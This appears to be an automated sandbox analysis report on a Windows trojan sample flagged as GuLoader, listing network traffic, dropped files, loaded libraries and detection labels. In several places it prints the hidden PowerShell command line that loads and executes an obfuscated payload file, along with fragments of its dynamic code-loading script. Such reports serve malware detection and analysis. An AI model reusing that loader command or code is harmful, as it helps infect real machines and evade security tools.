Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.11:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.11:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:50000 version: TLS 1.2

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Code function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405421

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe

Jump to dropped file

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004033B6

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

File created: C:\Windows\resources\unthick.ini

Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_00406847	0_2_00406847
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_00404C5E	0_2_00404C5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_071CC6A6	2_2_071CC6A6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9D288	9_2_02E9D288
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E95380	9_2_02E95380
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9C148	9_2_02E9C148
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9C748	9_2_02E9C748
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9C478	9_2_02E9C478
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9CA18	9_2_02E9CA18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9E988	9_2_02E9E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9CFB8	9_2_02E9CFB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9CCE8	9_2_02E9CCE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9D278	9_2_02E9D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E95362	9_2_02E95362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9A088	9_2_02E9A088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E97118	9_2_02E97118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9C738	9_2_02E9C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9C468	9_2_02E9C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E93ABF	9_2_02E93ABF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E93A27	9_2_02E93A27
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9CA08	9_2_02E9CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E93B0B	9_2_02E93B0B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E969B0	9_2_02E969B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9E97A	9_2_02E9E97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E93E09	9_2_02E93E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9CFAA	9_2_02E9CFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_02E9CCD8	9_2_02E9CCD8

Source: RmIYOfX0yO.exe

Static PE information: invalid certificate

Source: RmIYOfX0yO.exe, 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameharbinger.exeJ vs RmIYOfX0yO.exe

Source: RmIYOfX0yO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/16@5/5

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

0_2_004033B6

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046E2

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

File created: C:\Users\user\AppData\Local\magmaet

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

File created: C:\Users\user\AppData\Local\Temp\nss6CC0.tmp

Jump to behavior

Source: RmIYOfX0yO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RmIYOfX0yO.exe	Virustotal: Detection: 73%
Source: RmIYOfX0yO.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

File read: C:\Users\user\Desktop\RmIYOfX0yO.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RmIYOfX0yO.exe "C:\Users\user\Desktop\RmIYOfX0yO.exe"
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

File written: C:\Windows\Resources\unthick.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RmIYOfX0yO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdbIw source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %lqm.Core.pdb source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2184195240.0000000006F59000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2191615306.000000000D623000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ilmarcherne $Grex $Skammede28), (Sups181 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Conjunctions = [AppDomain]::CurrentDomain.GetAssemblies()$global:H
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Vredesskrigenes)), $mobiliseres).DefineDynamicModule($Outflee, $false).DefineType($Kapaciteter, $Klokkeslettet, [System.MulticastDeleg

Suspicious powershell command line found

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_02A0E9F8 push eax; mov dword ptr [esp], edx	2_2_02A0EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_071C0FC4 push es; iretd	2_2_071C0FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08F23A2C push 8BD68B50h; iretd	2_2_08F23A31
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08F20DA1 push 8BD68B50h; iretd	2_2_08F20DA6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_04134967 push ebx; iretd	9_2_04134983
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_041323A6 push ds; iretd	9_2_041323A7

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	File created: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
